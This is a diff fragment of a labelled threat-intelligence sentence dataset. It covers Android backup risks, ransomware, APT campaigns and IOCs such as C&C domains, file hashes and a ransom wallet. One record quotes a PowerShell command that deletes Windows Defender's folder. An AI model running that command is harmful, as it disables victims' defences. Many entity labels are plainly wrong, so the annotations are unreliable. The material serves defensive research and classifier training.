RpcAddPrinterDriverEx().","entities":[{"id":24249,"label":"identity","start_offset":0,"end_offset":9},{"id":24250,"label":"location","start_offset":36,"end_offset":43}],"relations":[],"Comments":[]} -{"id":7835,"text":"Today, Palo Alto Networks researcher Claud Xiao is delivering a presentation titled “Insecure Internal Storage in Android” at the Hacks in Taiwan Conference (HITCON). Claud is discussing techniques for accessing private data in Android’s internal storage system using the Android Debug Bridge (ADB) backup\/restore functionality.","entities":[],"relations":[],"Comments":[]} -{"id":7844,"text":" While there is still debate about how to store passwords in internal storage, if Android internal storage isn’t accessible to anything but the application that owns it, it remains secure.","entities":[],"relations":[],"Comments":[]} -{"id":7853,"text":"If an attacker has control over a PC, which the Android device is attached to (for charging or for other purposes), they don’t need to get physical access to the phone.","entities":[],"relations":[],"Comments":[]} -{"id":7855,"text":"Or through a rogue “charging station” which users plug their device into without thought. 2.","entities":[{"id":24339,"label":"malware","start_offset":13,"end_offset":18}],"relations":[],"Comments":[]} -{"id":7856,"text":"Next, the device must support ADB backup, which was not introduced until Android 4.0 (Ice Cream Sandwich).","entities":[],"relations":[],"Comments":[]} -{"id":7857,"text":"As of July 7, this includes 85.8% of active Android devices.","entities":[],"relations":[],"Comments":[]} -{"id":7858,"text":"For these devices, ADB debugging must be enabled for backup to work.","entities":[],"relations":[],"Comments":[]} -{"id":7860,"text":"Some device vendors have even left it enabled by default when shipping their phones.","entities":[],"relations":[],"Comments":[]} -{"id":7864,"text":"If the device is running Android 4.2.2 or above (approximately 54.3% of active devices) it uses ADB authentication.","entities":[],"relations":[],"Comments":[]} -{"id":7868,"text":"Finally, when an ADB backup is initiated, a window pops up on the device screen to ask the user to press “Back up my data.”","entities":[],"relations":[],"Comments":[]} -{"id":7876,"text":"Of the 12,351 applications on the Google Play store with > 500,000 installations, only 556 explicitly disable this backup system.","entities":[],"relations":[],"Comments":[]} -{"id":7877,"text":"Another 156 implement a BackupAgent that restricts which data is subject to the backup.","entities":[],"relations":[],"Comments":[]} -{"id":7878,"text":"The other 94.2% of applications place no restrictions on the backup of their internal storage data.","entities":[],"relations":[],"Comments":[]} -{"id":7879,"text":" This includes (as discussed earlier) the default Android Mail and Browser applications, but also other e-mail, SSH and FTP applications, many of which store login and password details without any additional encryption.","entities":[{"id":24386,"label":"location","start_offset":63,"end_offset":66},{"id":24387,"label":"location","start_offset":116,"end_offset":119},{"id":24388,"label":"malware","start_offset":120,"end_offset":123},{"id":24389,"label":"location","start_offset":138,"end_offset":142},{"id":24390,"label":"location","start_offset":164,"end_offset":167}],"relations":[],"Comments":[]} -{"id":7881,"text":"Google could reverse this situation by making setting the android:allowBackup property to false by default, requiring developers to opt-in to the backup system, rather than opt-out.","entities":[],"relations":[],"Comments":[]} -{"id":7890,"text":"What a difference a year makes in the threat environment.","entities":[],"relations":[],"Comments":[]} +{"id":2069,"text":"The videos had no sound, but the threat actor would type commentary on a terminal to address something the viewer was observing on screen.","entities":[],"relations":[],"Comments":[]} +{"id":10671,"text":"Table 1: The 15 vulnerabilities weaponized since 2017 CVE ID cvss3 score Description CVE-2021-42013 9.8 Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) CVE-2021-41773 7.5","entities":[{"id":32570,"label":"attack-pattern","start_offset":105,"end_offset":119},{"id":32571,"label":"location","start_offset":120,"end_offset":123},{"id":32572,"label":"location","start_offset":124,"end_offset":130},{"id":32573,"label":"location","start_offset":149,"end_offset":155},{"id":32574,"label":"location","start_offset":175,"end_offset":178},{"id":32575,"label":"location","start_offset":214,"end_offset":219},{"id":32576,"label":"location","start_offset":230,"end_offset":235}],"relations":[],"Comments":[]} +{"id":5101,"text":"The attackers made multiple attempts to use the exploit days after the vulnerability was patched on February 14, which stresses the importance of applying security updates as they become available.","entities":[{"id":51206,"label":"TIME","start_offset":100,"end_offset":111}],"relations":[],"Comments":[]} +{"id":2169,"text":"Microsoft recommends that customers of Microsoft Defender for Endpoint enable the attack surface reduction rule BlockOfficeCreateProcessRule.","entities":[{"id":45408,"label":"identity","start_offset":0,"end_offset":9},{"id":45409,"label":"SOFTWARE","start_offset":39,"end_offset":70}],"relations":[],"Comments":[]} +{"id":2886,"text":" Neither of these variables is actually used in this exploit.","entities":[],"relations":[],"Comments":[]} +{"id":3097,"text":" Because these vulnerabilities affect the processors at the physical layer, the only way for the vulnerabilities to be fully addressed is for the processors to be replaced or to have a firmware update.","entities":[],"relations":[],"Comments":[]} +{"id":7493,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} +{"id":13905,"text":" Execution and impact The execution of the actual ransomware occurs next.","entities":[],"relations":[],"Comments":[]} +{"id":13486,"text":"Our actions against coordinated influence operations from January, February and March can be found in the Q1 Bulletin.","entities":[{"id":51557,"label":"TIME","start_offset":58,"end_offset":65},{"id":51558,"label":"TIME","start_offset":67,"end_offset":75},{"id":51559,"label":"TIME","start_offset":80,"end_offset":85}],"relations":[],"Comments":[]} +{"id":11733,"text":"-ms[.]net C&C cdn-sop[.]net C&C fqn-cloud[.]net C&C ms-trace[.]net C&C imail.aop.gov-af[.]org Phishing Domain mail-apfgavnp.hopto[.]org Phishing Domain mail-apfgovnp.ddns[.]net Phishing Domain mail-kmgcom.ddns[.]net Phishing Domain mail-mfagovcn.hopto[.]org Phishing Domain mail","entities":[{"id":36141,"label":"attack-pattern","start_offset":115,"end_offset":123},{"id":36142,"label":"attack-pattern","start_offset":162,"end_offset":170},{"id":36143,"label":"attack-pattern","start_offset":208,"end_offset":216},{"id":36144,"label":"attack-pattern","start_offset":252,"end_offset":260},{"id":36145,"label":"attack-pattern","start_offset":299,"end_offset":307}],"relations":[],"Comments":[]} +{"id":2843,"text":"There have been several theories: Unit 42 believes the most likely delivery method is method #2.","entities":[{"id":48048,"label":"identity","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} +{"id":716,"text":"If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":46283,"label":"attack-pattern","start_offset":55,"end_offset":76},{"id":46284,"label":"attack-pattern","start_offset":81,"end_offset":99}],"relations":[],"Comments":[]} +{"id":11250,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[{"id":34390,"label":"location","start_offset":72,"end_offset":82},{"id":34391,"label":"location","start_offset":97,"end_offset":100},{"id":34392,"label":"threat-actor","start_offset":139,"end_offset":143},{"id":34393,"label":"location","start_offset":195,"end_offset":205}],"relations":[],"Comments":[]} +{"id":13634,"text":"Online shop administrators should be aware that potential attacks may come not only from spam but also from different \u2014 and unexpected \u2014 infection vectors.","entities":[],"relations":[],"Comments":[]} +{"id":1937,"text":"We did not find Urpage victims in our telemetry, likely because of the targeted nature of these attacks.","entities":[{"id":5704,"label":"threat-actor","start_offset":16,"end_offset":22}],"relations":[],"Comments":[]} +{"id":5009,"text":"NOTE: On May 20th, we updated our attribution to more precisely describe our findings.","entities":[{"id":51062,"label":"TIME","start_offset":9,"end_offset":17}],"relations":[],"Comments":[]} +{"id":3917,"text":"The attack features the following script:","entities":[],"relations":[],"Comments":[]} +{"id":1866,"text":"Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors\u2019 presence","entities":[],"relations":[],"Comments":[]} +{"id":8141,"text":"When encrypting, it creates a block of data we named headData.","entities":[],"relations":[],"Comments":[]} +{"id":12446,"text":"We terminated 35 YouTube channels as part of our investigation into coordinated influence operations linked to Azerbaijan.","entities":[],"relations":[],"Comments":[]} +{"id":13977,"text":"It also misses the incredible importance of identifying tactics, techniques, and tools used by global threat actor groups today.","entities":[],"relations":[],"Comments":[]} +{"id":14283,"text":"Get and upload dedicated directory file list ","entities":[],"relations":[],"Comments":[]} +{"id":5149,"text":"I'm going to drive back to the store.","entities":[],"relations":[],"Comments":[]} +{"id":3096,"text":" Because these affect processors, this means that the operating systems and applications that run on top of these processors are vulnerable.","entities":[],"relations":[],"Comments":[]} +{"id":4135,"text":"During our investigation, we found evidence of specific tools, which we listed in Table 1.","entities":[],"relations":[],"Comments":[]} +{"id":1595,"text":"Palo Alto Networks WildFire detected a new Android Trojan on May 7th, 2014 when a customer using our enterprise security platform downloaded the malicious application from the Google Play store.","entities":[{"id":46841,"label":"TIME","start_offset":61,"end_offset":74},{"id":46840,"label":"SOFTWARE","start_offset":0,"end_offset":27},{"id":46842,"label":"SOFTWARE","start_offset":176,"end_offset":193}],"relations":[],"Comments":[]} +{"id":6450,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":12297,"text":"We received leads from the FBI that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":1705,"text":"Antivirus programs running on the PC are trying eradicate the threat, the command and control domains and IPs are being added to denylist and blocked by networks around the world.","entities":[],"relations":[],"Comments":[]} +{"id":14065,"text":"This is a JavaScript file that executes with wscript.exe.","entities":[],"relations":[],"Comments":[]} +{"id":588,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":12641,"text":"It generates the needed key and initialization vector (IV) using a salt and secret key; the former is embedded in the code while the latter is generated dynamically using the SHA-256 hash of a randomly generated 32-byte long string.","entities":[{"id":39247,"label":"location","start_offset":28,"end_offset":31},{"id":39248,"label":"tools","start_offset":47,"end_offset":53},{"id":39249,"label":"location","start_offset":67,"end_offset":71},{"id":39250,"label":"location","start_offset":72,"end_offset":75},{"id":39252,"label":"location","start_offset":220,"end_offset":224}],"relations":[],"Comments":[]} +{"id":12327,"text":"We terminated 3 YouTube channels as part of our investigation into coordinated influence operations linked to France.","entities":[],"relations":[],"Comments":[]} +{"id":10750,"text":"While xxmm2_builder allows REDBALDKNIGHT to customize the settings of XXMM, xxmm2_ steganography is used to hide malicious code within an image file.","entities":[{"id":32853,"label":"threat-actor","start_offset":27,"end_offset":40},{"id":32854,"label":"malware","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} +{"id":9171,"text":"Unfortunately, Lurk is just one of the many cybercriminal groups looking to profit from organizations and end users.","entities":[{"id":28296,"label":"identity","start_offset":23,"end_offset":27},{"id":28297,"label":"location","start_offset":28,"end_offset":31},{"id":28298,"label":"location","start_offset":39,"end_offset":43},{"id":28299,"label":"location","start_offset":102,"end_offset":105}],"relations":[],"Comments":[]} +{"id":3800,"text":"Figure 2. Exploitation of CVE-2017-11882","entities":[{"id":49672,"label":"vulnerability","start_offset":26,"end_offset":40}],"relations":[],"Comments":[]} +{"id":12576,"text":"It still worked.","entities":[],"relations":[],"Comments":[]} +{"id":13064,"text":"This article lists the known malware strains that have been used over the past two years to install ransomware, all of which should serve as a \"code red\" moment for any organization.","entities":[],"relations":[],"Comments":[]} +{"id":961,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":2041,"text":"One possibility is that it is used to monitor ransomed systems for blue team and incident response (IR) activity, though even in that case it is unusual to see offensive tools dropped at this point in the infection.","entities":[],"relations":[],"Comments":[]} +{"id":5442,"text":"The Brazilian Central Bank recently announced that 2017 was the first year in which people did more banking using mobile devices than on PCs.","entities":[{"id":51441,"label":"identity","start_offset":4,"end_offset":26},{"id":51442,"label":"TIME","start_offset":51,"end_offset":55}],"relations":[],"Comments":[]} +{"id":2446,"text":"There are two variants of the webshell.","entities":[],"relations":[],"Comments":[]} +{"id":896,"text":" The following registry keys are also used within the CLOCK sub-path by PClock2: PClock2 proceeds to use the API from blockchain.info to generate a unique Bitcoin (BTC) wallet identifier, which is configured to automatically forward payments to a hardcoded wallet identifier of \u20181MRfkK134ErfbcadUSoSUCBahngCqoBKju\u2019.","entities":[{"id":46423,"label":"malware","start_offset":72,"end_offset":79},{"id":46424,"label":"malware","start_offset":82,"end_offset":89},{"id":46425,"label":"DOMAIN","start_offset":119,"end_offset":134}],"relations":[],"Comments":[]} +{"id":5455,"text":" They\u2019re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life. Got a topic you want us to write about for you, your friends, or your family?","entities":[{"id":51445,"label":"identity","start_offset":25,"end_offset":72}],"relations":[],"Comments":[]} +{"id":13198,"text":"The traffic is encrypted to evade detection.","entities":[],"relations":[],"Comments":[]} +{"id":1599,"text":" A developer using the ID \u201cfun app\u201d published the Trojan, and the remote control application they uploaded on April 21 is their most successful app so far, with between 10,000 and 50,000 downloads on the play store.","entities":[{"id":46846,"label":"TIME","start_offset":110,"end_offset":118}],"relations":[],"Comments":[]} +{"id":3370,"text":".Python.BIOPASS.A e479823aa41d3f6416233dba8e765cf2abaa38ad18328859a20b88df7f1d88d5 sc2.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A e567fd0f08fdafc5a89c9084373f3308ef464918ff7e4ecd7fb3135d777e946d sc3.txt","entities":[{"id":10186,"label":"malware","start_offset":94,"end_offset":105},{"id":10187,"label":"tools","start_offset":114,"end_offset":127},{"id":10188,"label":"SHA2","start_offset":164,"end_offset":228},{"id":10185,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48989,"label":"malware","start_offset":139,"end_offset":162},{"id":48987,"label":"malware","start_offset":1,"end_offset":17},{"id":48988,"label":"FILEPATH","start_offset":85,"end_offset":92},{"id":48990,"label":"FILEPATH","start_offset":230,"end_offset":237}],"relations":[{"id":548,"from_id":10185,"to_id":10186,"type":"indicates"},{"id":549,"from_id":48988,"to_id":10186,"type":"indicates"},{"id":553,"from_id":10187,"to_id":48989,"type":"related-to"},{"id":550,"from_id":48987,"to_id":10186,"type":"duplicate-of"},{"id":551,"from_id":10185,"to_id":48988,"type":"duplicate-of"},{"id":552,"from_id":10186,"to_id":10187,"type":"uses"},{"id":554,"from_id":10188,"to_id":48989,"type":"indicates"},{"id":555,"from_id":48990,"to_id":48989,"type":"indicates"},{"id":556,"from_id":48989,"to_id":10186,"type":"duplicate-of"}],"Comments":[]} +{"id":4216,"text":"The second fake website is again related to chat, with a background suggesting that it can help find users a partner.","entities":[],"relations":[],"Comments":[]} +{"id":13567,"text":"We observed that the scripts used during the attacks were customized.","entities":[],"relations":[],"Comments":[]} +{"id":11637,"text":"We learned that these pages were copied from their victims\u2019 webmail login pages and subsequently modified for phishing.","entities":[{"id":35709,"label":"location","start_offset":3,"end_offset":10},{"id":35710,"label":"location","start_offset":80,"end_offset":83},{"id":35711,"label":"attack-pattern","start_offset":110,"end_offset":118}],"relations":[],"Comments":[]} +{"id":13516,"text":"Consider using dedicated two-factor authentication apps or devices such as Yubikey instead of relying on SMS.","entities":[],"relations":[],"Comments":[]} +{"id":10078,"text":"This was carried out via a compromised version of a network monitoring application called SolarWinds Orion.","entities":[],"relations":[],"Comments":[]} +{"id":152,"text":"In some cases, the ransomware is sophisticated enough to target specific application files.","entities":[],"relations":[],"Comments":[]} +{"id":1056,"text":"An \u201coverlay attack\u201d is an attack where an attacker\u2019s app draws a window over (or \u201coverlays\u201d) other windows and apps running on the device.","entities":[{"id":44926,"label":"attack-pattern","start_offset":4,"end_offset":18}],"relations":[],"Comments":[]} +{"id":4713,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50607,"label":"malware","start_offset":102,"end_offset":109},{"id":50608,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50606,"label":"SOFTWARE","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} +{"id":2935,"text":"While we can\u2019t see how many people the other half of the samples affect, it\u2019s a reasonable supposition that the other half of the total samples affect just as many people as the half we can see.","entities":[],"relations":[],"Comments":[]} +{"id":4459,"text":"In 2017, Android \u2013 which is owned by Google \u2013 was the first mobile platform to warn users about NSO Group\u2019s Pegasus spyware.","entities":[{"id":50241,"label":"malware","start_offset":108,"end_offset":115},{"id":50237,"label":"TIME","start_offset":3,"end_offset":7},{"id":50240,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50238,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50239,"label":"identity","start_offset":37,"end_offset":43}],"relations":[{"id":933,"from_id":50241,"to_id":50240,"type":"authored-by"}],"Comments":[]} +{"id":2607,"text":"A hallmark of this group is the diversity of techniques used both for initial access and action-on-objective.","entities":[],"relations":[],"Comments":[]} +{"id":2789,"text":" The good news is that these attacks are more like denial of service attacks: they don\u2019t do lasting harm to your system and they end when you leave the site. The bad news is that these are harder to defend against than typical drive-by download attacks.","entities":[],"relations":[],"Comments":[]} +{"id":1384,"text":"PowerShell process used to delete Windows Defender, e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse 8. File InstallUtil.exe running from C:\\Users\\[USERNAME]\\AppData\\Local\\Temp directory.","entities":[{"id":4148,"label":"tools","start_offset":0,"end_offset":10},{"id":46727,"label":"FILEPATH","start_offset":122,"end_offset":163},{"id":46726,"label":"FILEPATH","start_offset":57,"end_offset":114},{"id":46728,"label":"FILEPATH","start_offset":183,"end_offset":198},{"id":46725,"label":"tools","start_offset":34,"end_offset":50},{"id":46729,"label":"FILEPATH","start_offset":212,"end_offset":251}],"relations":[],"Comments":[]} +{"id":551,"text":"The victims can find the threat actor\u2019s user name through specific group chat software or follow a chat group link in the ransom note. Ransom payment operations are complicated and highly automated processes.","entities":[],"relations":[],"Comments":[]} +{"id":13496,"text":"One of the most prolific cybermercenaries is Void Balaur, a Russian-speaking threat actor group that has launched attacks against different sectors and industries all over the world.","entities":[{"id":51564,"label":"threat-actor","start_offset":45,"end_offset":56}],"relations":[],"Comments":[]} +{"id":13122,"text":"For others, digital transformation had been a priority for much longer, but the events of the past two years added a new sense of urgency.","entities":[],"relations":[],"Comments":[]} +{"id":3857,"text":"In this scenario, accevent.exe is the primary executable, which is usually legitimate.","entities":[{"id":49716,"label":"FILEPATH","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} +{"id":3513,"text":"ShellManage - Creates a shell.","entities":[],"relations":[],"Comments":[]} +{"id":2584,"text":" Unit 42 has helped organizations respond to multiple Lapsus$ attacks.","entities":[{"id":47769,"label":"identity","start_offset":1,"end_offset":8},{"id":7797,"label":"threat-actor","start_offset":54,"end_offset":61}],"relations":[],"Comments":[]} +{"id":1368,"text":"More information about these protections can be found within the Mitigation Actions section of the briefing.","entities":[],"relations":[],"Comments":[]} +{"id":3726,"text":"Continuous vigilance against threat groups is an important aspect of keeping up with \u2014 if not being one step ahead of \u2014 threats.","entities":[],"relations":[],"Comments":[]} +{"id":2302,"text":"In this blog we analyze the technical details of the exploit chain and share IOCs to help teams defend against similar style attacks.","entities":[],"relations":[],"Comments":[]} +{"id":2280,"text":"This past year, TAG has been collaborating with Google\u2019s CyberCrime Investigation Group to disrupt Glupteba activity involving Google services.","entities":[{"id":45441,"label":"identity","start_offset":16,"end_offset":19},{"id":45438,"label":"malware","start_offset":99,"end_offset":107},{"id":45439,"label":"identity","start_offset":48,"end_offset":87},{"id":45440,"label":"SOFTWARE","start_offset":127,"end_offset":142}],"relations":[],"Comments":[]} +{"id":3198,"text":"The legitimate known application is downloaded and executed.","entities":[],"relations":[],"Comments":[]} +{"id":13684,"text":"jQuery method is used to post the target\u2019s credentials to hosting site The phishing pages record passwords inputted by site visitors.","entities":[{"id":51752,"label":"attack-pattern","start_offset":79,"end_offset":87}],"relations":[],"Comments":[]} +{"id":1296,"text":" If the file does not exist, it will make the following GET request: The filename and name parameters are statically set in the above request.","entities":[],"relations":[],"Comments":[]} +{"id":185,"text":"Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced.","entities":[{"id":45851,"label":"TIME","start_offset":13,"end_offset":20},{"id":45852,"label":"attack-pattern","start_offset":34,"end_offset":70}],"relations":[],"Comments":[]} +{"id":2900,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 15)]","entities":[],"relations":[],"Comments":[]} +{"id":9678,"text":"Figure 16.","entities":[],"relations":[],"Comments":[]} +{"id":7586,"text":"The latter is a configuration file that handles files to install.","entities":[],"relations":[],"Comments":[]} +{"id":4232,"text":"At the end of last year, a C&C from the same threat actor was not only accessible from any IP address, but it was possible to browse the server directory tree without authentication.","entities":[],"relations":[],"Comments":[]} +{"id":14037,"text":"These paths leak information about the third-party libraries\u2019 installed paths.","entities":[],"relations":[],"Comments":[]} +{"id":4077,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} +{"id":23,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":3518,"text":"The trigger format is: %system32\/rundll32.exe .","entities":[{"id":49303,"label":"FILEPATH","start_offset":23,"end_offset":45}],"relations":[],"Comments":[]} +{"id":9530,"text":"Gh0st RAT","entities":[{"id":29237,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":14112,"text":"Other public references also used the compiled binary time of samples attributed to APT37.","entities":[{"id":48180,"label":"threat-actor","start_offset":84,"end_offset":89}],"relations":[],"Comments":[]} +{"id":4542,"text":"In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.","entities":[],"relations":[],"Comments":[]} +{"id":4818,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50750,"label":"identity","start_offset":35,"end_offset":38},{"id":50751,"label":"identity","start_offset":57,"end_offset":75},{"id":50752,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50753,"label":"threat-actor","start_offset":88,"end_offset":96},{"id":50749,"label":"identity","start_offset":16,"end_offset":23},{"id":50754,"label":"vulnerability","start_offset":132,"end_offset":153}],"relations":[{"id":1006,"from_id":50753,"to_id":50754,"type":"exploits"},{"id":1007,"from_id":50752,"to_id":50754,"type":"exploits"}],"Comments":[]} +{"id":1470,"text":"For security reasons we are not posting the names of any of these apps.","entities":[],"relations":[],"Comments":[]} +{"id":2737,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":9054,"text":"RATANKBA host manipulation console RATANKBA\u2019s controllers use the \u201cNimo Software HTTP Retriever 1.0\u201d user-agent string for its communication.","entities":[{"id":27961,"label":"malware","start_offset":0,"end_offset":8},{"id":27962,"label":"location","start_offset":9,"end_offset":13},{"id":27963,"label":"malware","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} +{"id":234,"text":" We monitored a list of 50 legitimate Ukraine-related domains (e.g., popular news and donation websites) and keywords (e.g., Ukraine, refugee) as targets for cybersquatting.","entities":[{"id":45781,"label":"location","start_offset":125,"end_offset":132},{"id":45934,"label":"location","start_offset":38,"end_offset":45},{"id":44651,"label":"attack-pattern","start_offset":158,"end_offset":172}],"relations":[{"id":137,"from_id":44651,"to_id":45781,"type":"targets"}],"Comments":[]} +{"id":4474,"text":"Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.","entities":[{"id":50270,"label":"identity","start_offset":21,"end_offset":30}],"relations":[],"Comments":[]} +{"id":5706,"text":" Figure 2. Fake installation pop-up The third attack vector used by Earth Lusca is the exploitation of vulnerabilities that exist in the public-facing applications \u2014 such as Microsoft Exchange ProxyShell and Oracle GlassFish \u2014 of its targets.","entities":[{"id":17601,"label":"location","start_offset":33,"end_offset":36},{"id":17603,"label":"tools","start_offset":61,"end_offset":67},{"id":17604,"label":"threat-actor","start_offset":76,"end_offset":87},{"id":17605,"label":"location","start_offset":145,"end_offset":151},{"id":17607,"label":"location","start_offset":192,"end_offset":200},{"id":17609,"label":"location","start_offset":212,"end_offset":215}],"relations":[],"Comments":[]} +{"id":5148,"text":"I need a loaf of bread.","entities":[],"relations":[],"Comments":[]} +{"id":3367,"text":"Python.BIOPASS.A","entities":[{"id":48985,"label":"malware","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} +{"id":5360,"text":"The content of \/proc\/mtd for an Asus RT-AC68U device is as follows: Figure 7.","entities":[{"id":51364,"label":"FILEPATH","start_offset":15,"end_offset":24}],"relations":[],"Comments":[]} +{"id":10303,"text":"Troj.Win32.TRX.XXPE50FFF039 50b000a7d61885591ba4ec9df1a0a223dbceb1ac2facafcef3d65c8cbbd64d46 email.exe","entities":[{"id":31452,"label":"SHA2","start_offset":29,"end_offset":93}],"relations":[],"Comments":[]} +{"id":3578,"text":"The watermarking technique is implemented through the module attributes of the assembly.","entities":[],"relations":[],"Comments":[]} +{"id":5065,"text":"Once a user provides credentials in the dialog, they are posted to an attacker controlled domain.","entities":[],"relations":[],"Comments":[]} +{"id":11128,"text":"For example in 2017, our Security Reliability Engineering team measured a record-breaking UDP amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and 9394), which remains the largest bandwidth attack of which we are aware.","entities":[{"id":34002,"label":"attack-pattern","start_offset":94,"end_offset":107},{"id":34005,"label":"location","start_offset":163,"end_offset":167},{"id":34007,"label":"location","start_offset":176,"end_offset":179},{"id":34008,"label":"location","start_offset":242,"end_offset":245}],"relations":[],"Comments":[]} +{"id":11504,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":35193,"label":"attack-pattern","start_offset":25,"end_offset":33},{"id":35195,"label":"location","start_offset":131,"end_offset":134},{"id":35197,"label":"attack-pattern","start_offset":202,"end_offset":210}],"relations":[],"Comments":[]} +{"id":14375,"text":"One messy reality is that enterprises don\u2019t manage all their endpoints.","entities":[],"relations":[],"Comments":[]} +{"id":13713,"text":"Indicators of compromise (IOCs) Threat actor-managed C&C URLs: https:\/\/highstreetmuch[.]xyz\/hug\/gate[.]php https:\/\/takeusall[.]online\/benzz\/gate[.]PHP MITRE ATT&CK\u00ae Matrix Tags Cloud | APT & Targeted Attacks | Research | Phishing | Articles, News, Reports","entities":[{"id":51760,"label":"URL","start_offset":64,"end_offset":107},{"id":51761,"label":"URL","start_offset":108,"end_offset":151}],"relations":[],"Comments":[]} +{"id":1821,"text":"We noted that it can disable a number of antivirus products, previously identified by Aon\u2019s researchers.","entities":[{"id":45143,"label":"identity","start_offset":86,"end_offset":103}],"relations":[],"Comments":[]} +{"id":11724,"text":"Trojan.W97M.SIDEWINDER.A AB7C1967BF1FEFDFFDE93626B78EB30994655AB02F59E0ADB0935E3E599A953F RTF file Trojan.W97M.SIDEWINDER.A 2548A819E4C597BA5958D2D18BAA544452948E5B00271570192CCD79ABE88E8D 1.a JS file Trojan.JS.SIDEWINDER.A Downloader.","entities":[{"id":36129,"label":"SHA2","start_offset":29,"end_offset":93},{"id":36130,"label":"SHA2","start_offset":134,"end_offset":198}],"relations":[],"Comments":[]} +{"id":9375,"text":" Figure 7. gooogle[.]press registration info","entities":[],"relations":[],"Comments":[]} +{"id":5468,"text":"However, we construe them to be different groups, possibly within the same community, with different objectives and modi operandi.","entities":[],"relations":[],"Comments":[]} +{"id":1011,"text":"Figure 4:","entities":[],"relations":[],"Comments":[]} +{"id":6567,"text":"A rough translation of this message is as follows: \u201cFxxk, when I am released, the server is offline, I can\u2019t find the machine, the domain is expired, it is so bad.","entities":[],"relations":[],"Comments":[]} +{"id":4496,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50298,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} +{"id":376,"text":"Palo Alto Networks strongly advises organizations to patch immediately.","entities":[{"id":46073,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} +{"id":5344,"text":"Finally, a variable containg the next time a packet should be sent is updated and all of the parameters are sent to the modules again.","entities":[],"relations":[],"Comments":[]} +{"id":3305,"text":"If the value of the \u201ctype\u201d argument is \u201cChrome\u201d, it will use the AES secret key or DPAPI (for Chrome versions before 80) to decrypt the cookie file.","entities":[{"id":48388,"label":"SOFTWARE","start_offset":94,"end_offset":100}],"relations":[],"Comments":[]} +{"id":1070,"text":" The particular vulnerability in question affects an Android feature known as \u201cToast.\u201d \u201cToast\u201d is a type of notification window that \u201cpops\u201d (like toast) on the screen.","entities":[{"id":46555,"label":"SOFTWARE","start_offset":53,"end_offset":60}],"relations":[],"Comments":[]} +{"id":5541,"text":"In a separate attack, 962 online stores were hit in just 24 hours.","entities":[],"relations":[],"Comments":[]} +{"id":13051,"text":"In this blog, Trend Micro shares security recommendations for organizations to ensure stable security practices in a cloud-first world.","entities":[],"relations":[],"Comments":[]} +{"id":2974,"text":"For most, it\u2019s something they set up once and forget about.","entities":[],"relations":[],"Comments":[]} +{"id":13154,"text":"We found the group was focused on stealing defense-, ocean-, and ship-related documents from target networks, which led us to believe that Tropic Trooper\u2019s main purpose is to exfiltrate confidential information or intelligence.","entities":[{"id":48938,"label":"threat-actor","start_offset":139,"end_offset":152}],"relations":[],"Comments":[]} +{"id":4301,"text":"Trend Micro Solutions Patchwork uses email as an entry point, which is why securing the email gateway is important.","entities":[{"id":50095,"label":"identity","start_offset":0,"end_offset":11},{"id":50096,"label":"threat-actor","start_offset":22,"end_offset":31}],"relations":[],"Comments":[]} +{"id":3830,"text":"If Koadic finds that the system is conducive to the attacker\u2019s interests, it downloads a base64-encrypted version of the ANEL malware from the Command-and-Control (C&C) server and executes it. Encrypted ANEL is decrypted using the \u201ccertutil -docode\u201d command.","entities":[{"id":11615,"label":"malware","start_offset":121,"end_offset":125},{"id":11618,"label":"malware","start_offset":204,"end_offset":208},{"id":49688,"label":"malware","start_offset":3,"end_offset":9}],"relations":[{"id":859,"from_id":49688,"to_id":11615,"type":"downloads"}],"Comments":[]} +{"id":928,"text":"While ransomware is a large problem for users, it\u2019s important to realize that not 